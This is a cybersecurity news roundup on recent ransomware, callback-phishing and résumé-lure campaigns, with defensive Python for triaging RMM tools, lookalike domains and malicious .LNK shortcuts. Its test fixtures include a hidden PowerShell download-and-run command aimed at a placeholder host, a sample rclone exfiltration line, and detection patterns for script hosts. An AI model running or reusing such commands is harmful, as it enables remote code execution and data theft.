Recently patched Windows zero-day vulnerability exploited by Play ransomware to breach U.S. organization
Threat actors linked to the Play ransomware group exploited a recently patched Windows vulnerability (CVE-2025-29824) as a zero-day in an attack on a U.S. organization, leveraging privilege escalation through the CLFS driver.
Researchers report the attackers likely gained initial access through a Cisco ASA appliance, then moved laterally inside the network using Grixba, a custom infostealer associated with Play, and payloads disguised as Palo Alto Networks software. They collected Active Directory data, escalated privileges with batch files and attempted to cover their tracks, but did not deploy ransomware.
The attack took place before Microsoft disclosed and patched the Windows privilege escalation zero-day vulnerability (CVE-2025-29824) in the Common Log File System Driver (clfs.sys) on April 8, 2025.
U.K.’s Legal Aid Agency and major retailers are recent victims of DragonForce ransomware group
The U.K.’s Legal Aid Agency (LAA), which manages billions in legal funding, warned law firms of a cyber incident that may have exposed financial information.
Around 2,000 legal service providers working under LAA contracts could be affected, though the agency has not confirmed any data access so far. In its letter to providers, the LAA acknowledged the risk to payment data and emphasized that it is investigating the issue and taking mitigation steps.
In addition to the LAA, the U.K.’s National Crime Agency and National Cyber Security Centre are investigating attacks against Harrods (2024 revenue of $1.34 billion), Marks and Spencer ($16.25 billion revenue in 2024) and Co-op ($14.3 billion revenue in 2024), all claimed by the DragonForce ransomware group. The NCSC has urged U.K. businesses to treat these incidents as a serious warning and bolster their cybersecurity defenses. Law enforcement has not released an official advisory on these attacks, but the M&S and Co-op intrusions are both believed to have started with social engineering.
U.S. firms breached by Luna Moth extortion attackers posing as IT help desks
The Luna Moth group, also known as Silent Ransom Group, has intensified its callback phishing attacks on U.S. legal and financial institutions.
According to researchers, the group's main objective is data theft and extortion, not ransomware deployment. These attacks typically begin with phishing emails urging recipients to call fake IT helpdesk numbers, where operators impersonate support staff. Victims are then tricked into installing legitimate remote monitoring tools like AnyDesk, Atera or Zoho Assist. Once installed, attackers gain direct access to systems and exfiltrate sensitive data using tools like WinSCP or Rclone. Luna Moth then demands ransoms between one and eight million dollars to prevent public leaks.
The group has registered over 37 fake helpdesk domains using typosquatting tactics. Researchers advise blocking known malicious domains and restricting unused RMM tools within corporate environments.
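The two pieces of advice above (restrict unused RMM tools, block lookalike help desk domains) translate directly into triage logic. The following is an added example, not code from the researchers' report: it runs an allowlist check over constructed process-creation events (the shape a SIEM gives Sysmon Event ID 1 or Windows 4688 records) and a lookalike check over constructed proxy-log domains. The binary names, install paths, the hypothetical brand "examplecorp" and the approved-tool list are assumptions for the demo, and the binary catalog is illustrative rather than exhaustive.

```python
import re
from collections import namedtuple

# Constructed catalog of binaries; illustrative only, confirm names against vendor documentation
RMM_BINARIES = {"anydesk.exe": "AnyDesk", "ateraagent.exe": "Atera",
                "za_connect.exe": "Zoho Assist", "zmagent.exe": "Zoho Assist"}
EXFIL_BINARIES = {"winscp.exe": "WinSCP", "rclone.exe": "Rclone"}
# Where a victim-downloaded installer lands, as opposed to a managed install under Program Files
USER_WRITABLE_RE = re.compile(r"\\users\\[^\\]+\\(downloads|desktop|appdata\\local\\temp)\\", re.I)
# rclone copy/sync/move with a configured remote ("name:path"); two or more chars rules out drive letters
RCLONE_REMOTE_RE = re.compile(r"\b(copy|sync|move)\b.*\s[A-Za-z0-9_-]{2,}:", re.I)
WINSCP_SCRIPT_RE = re.compile(r"/script|/command|\bs?ftps?://", re.I)

Finding = namedtuple("Finding", "host user tool reason cmdline")

def triage_process_events(events, approved_rmm):
    """Flag RMM and transfer tools in process-creation events; approved_rmm is the org's allowlist."""
    findings = []
    for ev in events:
        image = ev["image"]
        exe = image.rsplit("\\", 1)[-1].lower()
        cmd = ev.get("cmdline", "")
        if exe in RMM_BINARIES:
            tool = RMM_BINARIES[exe]
            if tool not in approved_rmm:
                findings.append(Finding(ev["host"], ev["user"], tool, "unapproved RMM tool executed", cmd))
            elif USER_WRITABLE_RE.search(image):
                findings.append(Finding(ev["host"], ev["user"], tool,
                                        "approved RMM tool run from a user-writable path, not the managed install", cmd))
        elif exe in EXFIL_BINARIES:
            tool = EXFIL_BINARIES[exe]
            if exe == "rclone.exe" and RCLONE_REMOTE_RE.search(cmd):
                reason = "rclone transfer to a remote"
            elif exe == "winscp.exe" and WINSCP_SCRIPT_RE.search(cmd):
                reason = "WinSCP scripted transfer"
            else:
                reason = "file transfer tool executed"
            findings.append(Finding(ev["host"], ev["user"], tool, reason, cmd))
    return findings

def edit_distance(a, b):
    """Levenshtein distance, used to catch one- or two-character typosquats of the brand."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def lookalike_domains(observed, brand, legit_domains, max_distance=2):
    """Domains whose registrable label contains or nearly matches the brand but are not the org's own.
    Multi-part public suffixes (co.uk) are not handled; short brands need a smaller max_distance."""
    hits = []
    for domain in observed:
        d = domain.lower()
        if any(d == legit or d.endswith("." + legit) for legit in legit_domains):
            continue
        label = d.split(".")[-2] if "." in d else d
        if any(tok == brand or edit_distance(tok, brand) <= max_distance for tok in label.split("-")):
            hits.append(domain)
    return hits

def triage_sample():
    """Constructed process events and an assumed allowlist of {Atera}; not real telemetry."""
    events = [
        {"host": "WS01", "user": "jdoe", "image": r"C:\Users\jdoe\Downloads\AnyDesk.exe", "cmdline": "AnyDesk.exe"},
        {"host": "WS02", "user": "svc_rmm", "image": r"C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe",
         "cmdline": "AteraAgent.exe"},
        {"host": "WS01", "user": "jdoe", "image": r"C:\Users\jdoe\AppData\Local\Temp\rclone.exe",
         "cmdline": r'rclone.exe copy "C:\Finance\Clients" mega:dump --transfers 8'},
        {"host": "WS03", "user": "jdoe", "image": r"C:\Users\jdoe\Downloads\AteraAgent.exe", "cmdline": "AteraAgent.exe"},
        {"host": "WS02", "user": "svc_backup", "image": r"C:\Program Files (x86)\WinSCP\WinSCP.exe",
         "cmdline": r'WinSCP.exe /command "open sftp://backup@203.0.113.5/" "put C:\Finance\*"'},
        {"host": "WS04", "user": "mlee", "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
    ]
    return triage_process_events(events, approved_rmm={"Atera"})

def domain_sample():
    """Constructed proxy-log domains for a hypothetical brand; only examplecorp.com is legitimate."""
    observed = ["examplecorp.com", "cdn.examplecorp.com", "examplecorp-helpdesk.com",
                "examp1ecorp-helpdesk.com", "helpdesk-examplecorp.net", "unrelated.org"]
    return lookalike_domains(observed, brand="examplecorp", legit_domains={"examplecorp.com"})

if __name__ == "__main__":
    for f in triage_sample():
        print(f"{f.host} {f.user} {f.tool}: {f.reason}")
    print("lookalike domains:", domain_sample())
```

The allowlist matters more than the blocklist: the scam does not rely on an exotic tool, it relies on the victim installing a legitimate one, so an approved product launched from a Downloads folder is as much a signal as an unapproved product. The WinSCP hit in the sample is a backup service account and may be benign; the function produces triage leads, not verdicts.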
Akira ransomware group hits Hitachi Vantara, forcing it to take systems offline
Hitachi Vantara, the data storage, infrastructure and hybrid cloud management subsidiary of Hitachi, Ltd., took several servers offline to contain a ransomware attack carried out by the Akira group.
The company, which serves major global brands and government agencies with cloud, infrastructure, and ransomware recovery solutions, confirmed the breach and activated its incident response protocols. External cybersecurity experts were engaged to investigate the impact, while systems were shut down to prevent further spread.
Although Hitachi did not officially name the threat actor, researchers learned that Akira was behind the intrusion, had stolen data and had dropped ransom notes on compromised machines. While cloud services remain operational, internal systems, support functions and Hitachi Vantara Manufacturing have been disrupted. Sources indicate that projects tied to government entities were also affected. Akira, active since 2023, had breached over 250 organizations and extorted around $42 million in ransoms by April 2024, and claimed more than 270 further victims between January and April 2025.
Hiring managers are targets of 'Venom Spider' spear-phishing campaign
Researchers uncovered a spear-phishing campaign by the threat actor "Venom Spider" that targets HR staff by posing as job seekers.
The attackers send emails with fake résumés, tricking hiring managers into downloading malicious zip files that contain a Windows shortcut file (.LNK) used to initiate the attack. Once opened, the file secretly launches scripts and installs a backdoor called "More_eggs," which collects system information and connects to a command-and-control server. Venom Spider’s techniques include polymorphic files, time-delayed execution and the use of legitimate Windows utilities to evade detection. This campaign has been ongoing since at least October 2023 and follows earlier activity traced back to 2018.
Researchers warn that HR staff are especially exposed because their work involves routinely opening email attachments from strangers. Employees are advised to inspect suspicious file types such as .LNK, ISO or VBS before opening them, even when they arrive posing as legitimate job application documents.
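"Inspect the file before opening it" is only useful if the inspection reads what the shortcut will actually do. The following is an added example, not code from the researchers' write-up or from the campaign: it parses the fixed header and string fields of a Windows Shell Link (.LNK) per the MS-SHLLINK layout and lists the entries of a résumé-style zip without executing anything. The archive, the shortcut bytes, the PowerShell one-liner, the icon path and the indicator rules are constructed for the demo; the LNK is built with an empty item-ID list, so it is not a usable shortcut, only a parseable one.

```python
import io
import re
import struct
import zipfile

# ShellLinkHeader layout from MS-SHLLINK: size, CLSID, LinkFlags at 20, ShowCommand at 60
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
(HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH,
 HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE) = (1 << i for i in range(8))
SW_SHOWMINNOACTIVE = 7  # ShowCommand that keeps the launched window out of sight
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"), (HAS_WORKDIR, "working_dir"),
                 (HAS_ARGS, "arguments"), (HAS_ICON, "icon_location"))
SCRIPT_HOST_RE = re.compile(r"\b(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|regsvr32|certutil|bitsadmin)(\.exe)?\b", re.I)
HIDDEN_ARGS_RE = re.compile(r"-(w|windowstyle)\s+hidden|-(e|enc|encodedcommand)\b|-nop\b|\biex\b|invoke-expression|downloadstring|frombase64string", re.I)
DOC_ICON_RE = re.compile(r"winword|excel|acrord32|acrobat|wordpad|notepad", re.I)
DOUBLE_EXT_RE = re.compile(r"\.(pdf|docx?|xlsx?|rtf|txt)\.\w{2,4}$", re.I)
DANGEROUS_EXT = {"lnk", "iso", "img", "vbs", "vbe", "js", "jse", "hta", "wsf", "cmd", "bat", "ps1"}

def parse_lnk(data):
    """Return header flags, ShowCommand and the StringData fields; IDList and LinkInfo are skipped by size."""
    if len(data) < LNK_HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link (.LNK) file")
    flags = struct.unpack_from("<I", data, 20)[0]
    info = {"flags": flags, "show_command": struct.unpack_from("<I", data, 60)[0]}
    off = LNK_HEADER_SIZE
    if flags & HAS_IDLIST:    # IDListSize (uint16) followed by that many bytes of shell items
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINKINFO:  # LinkInfoSize (uint32) counts the whole structure, itself included
        off += struct.unpack_from("<I", data, off)[0]
    for bit, name in STRING_FIELDS:  # CountCharacters (uint16) then the characters, no terminator
        if flags & bit:
            count = struct.unpack_from("<H", data, off)[0]
            off += 2
            width = 2 if flags & IS_UNICODE else 1
            raw = data[off:off + width * count]
            info[name] = raw.decode("utf-16-le") if width == 2 else raw.decode("cp1252", "replace")
            off += width * count
    return info

def lnk_indicators(info):
    """Constructed indicator rules for a shortcut that arrived as an attachment."""
    hits = []
    target = " ".join(info.get(k, "") for k in ("relative_path", "working_dir", "arguments"))
    args = info.get("arguments", "")
    if SCRIPT_HOST_RE.search(target):
        hits.append("target or arguments invoke a shell or script host")
    if HIDDEN_ARGS_RE.search(args):
        hits.append("arguments hide the window, encode or download a payload")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        hits.append("ShowCommand is SW_SHOWMINNOACTIVE (window launched minimized)")
    if len(args) > 200:
        hits.append("unusually long argument string")
    if DOC_ICON_RE.search(info.get("icon_location", "")) and SCRIPT_HOST_RE.search(target):
        hits.append("document icon masking a non-document target")
    return hits

def triage_zip(zip_bytes):
    """Map risky archive entries to their indicators without extracting or opening anything."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for entry in zf.infolist():
            if entry.is_dir():
                continue
            name = entry.filename
            ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
            hits = [f"dangerous extension .{ext}"] if ext in DANGEROUS_EXT else []
            if DOUBLE_EXT_RE.search(name):
                hits.append("document extension placed before the real one")
            if ext == "lnk":
                try:
                    hits += lnk_indicators(parse_lnk(zf.read(entry)))
                except (ValueError, struct.error) as exc:
                    hits.append(f"malformed .lnk: {exc}")
            if hits:
                findings[name] = hits
    return findings

def build_sample_lnk(relative_path, working_dir, arguments, icon_location, show_command):
    """Constructed .LNK bytes: valid header, an IDList holding only the TerminalID, UTF-16 string fields."""
    flags = HAS_IDLIST | HAS_RELPATH | HAS_WORKDIR | HAS_ARGS | HAS_ICON | IS_UNICODE
    header = struct.pack("<I16sIIQQQIiIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    idlist = struct.pack("<H", 2) + b"\x00\x00"
    def s(text):
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + idlist + s(relative_path) + s(working_dir) + s(arguments) + s(icon_location) + b"\x00\x00\x00\x00"

def build_sample_zip():
    """Constructed lure archive: a '.pdf.lnk' résumé beside a harmless decoy; URL and paths are placeholders."""
    lnk = build_sample_lnk(
        relative_path=r"..\..\..\Windows\System32\cmd.exe", working_dir="%TEMP%",
        arguments='/c powershell -w hidden -nop -c "iex (New-Object Net.WebClient).DownloadString(\'http://example.invalid/stage\')"',
        icon_location=r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        show_command=SW_SHOWMINNOACTIVE)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Resume_J_Doe.pdf.lnk", lnk)
        zf.writestr("Cover_Letter.txt", "constructed decoy text")
    return buf.getvalue()

if __name__ == "__main__":
    for name, hits in triage_zip(build_sample_zip()).items():
        print(name, "->", "; ".join(hits))
```

The parser stops at the string fields, which is where the launch command lives; real shortcuts also carry the target in the item-ID list and in extra-data blocks, so a production triage tool should decode those as well. Note that the visible name "Resume_J_Doe.pdf.lnk" is shown by Explorer as "Resume_J_Doe.pdf" with the Word-style icon the shortcut requests, which is exactly why the check has to read the bytes rather than trust the listing.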